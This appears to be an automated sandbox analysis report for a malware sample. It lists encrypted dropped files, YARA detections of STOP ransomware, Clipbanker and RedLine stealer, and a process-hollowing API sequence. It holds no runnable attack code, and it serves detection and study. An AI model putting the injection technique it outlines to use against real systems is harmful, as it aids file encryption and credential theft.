Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgzq (copy) entropy: 7.99275004903	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgzq (copy) entropy: 7.99717827276	Jump to dropped file
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgzq (copy) entropy: 7.99632009307	Jump to dropped file
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm entropy: 7.99451230121	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 32.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 12.2.build3.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 12.2.build3.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.24215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.24215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.24215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.24215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 1.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.build3.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 12.2.build3.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 1.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 6.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001C.00000002.2793160665.0000000000A80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.2042770332.00000000009BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1863423923.0000000004261000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001E.00000002.3443741375.0000000000950000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.2212389849.0000000000960000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000020.00000002.4018244019.00000000008C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.1939543424.000000000081D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1863815336.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2097220953.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.2108951598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000017.00000002.2096966521.000000000449B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.1724605864.00000000043FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.1692193244.000000000459C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000003.00000002.1714774399.000000000443C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.1878433305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000007.00000002.1803095933.0000000001CAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: mJVVW85CnW.exe PID: 6932, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: mJVVW85CnW.exe PID: 6984, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: mJVVW85CnW.exe PID: 6288, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: mJVVW85CnW.exe PID: 1516, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: mJVVW85CnW.exe PID: 7152, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: mJVVW85CnW.exe PID: 6696, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,		0_2_05E30110
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 3_2_05DF0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,		3_2_05DF0110

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_00404F7E	0_2_00404F7E
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E33520	0_2_05E33520
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E37520	0_2_05E37520
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E5D7F1	0_2_05E5D7F1
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3A79A	0_2_05E3A79A
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3C760	0_2_05E3C760
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3E6E0	0_2_05E3E6E0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E7B69F	0_2_05E7B69F
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3A699	0_2_05E3A699
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E5D1A4	0_2_05E5D1A4
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E7E141	0_2_05E7E141
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E39120	0_2_05E39120
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E370E0	0_2_05E370E0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E330F0	0_2_05E330F0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E400D0	0_2_05E400D0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3B0B0	0_2_05E3B0B0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3A026	0_2_05E3A026
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E4F030	0_2_05E4F030
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3B000	0_2_05E3B000
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E37393	0_2_05E37393
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E7E37C	0_2_05E7E37C
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05EB22C0	0_2_05EB22C0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E37220	0_2_05E37220
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E35DE7	0_2_05E35DE7
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E35DF7	0_2_05E35DF7
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E72D1E	0_2_05E72D1E
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E64E9F	0_2_05E64E9F
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E38E60	0_2_05E38E60
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E359F7	0_2_05E359F7
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E389D0	0_2_05E389D0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E5E9A3	0_2_05E5E9A3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E5F9B0	0_2_05E5F9B0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3A916	0_2_05E3A916
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E518D0	0_2_05E518D0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E37880	0_2_05E37880
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3DBE0	0_2_05E3DBE0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E32B60	0_2_05E32B60
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E40B00	0_2_05E40B00
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E37A80	0_2_05E37A80
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 0_2_05E3CA10	0_2_05E3CA10
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040D240	1_2_0040D240
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00419F90	1_2_00419F90
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00405057	1_2_00405057
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040C070	1_2_0040C070
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0042E003	1_2_0042E003
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0042F010	1_2_0042F010
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00408030	1_2_00408030
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_004070E0	1_2_004070E0
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00410160	1_2_00410160
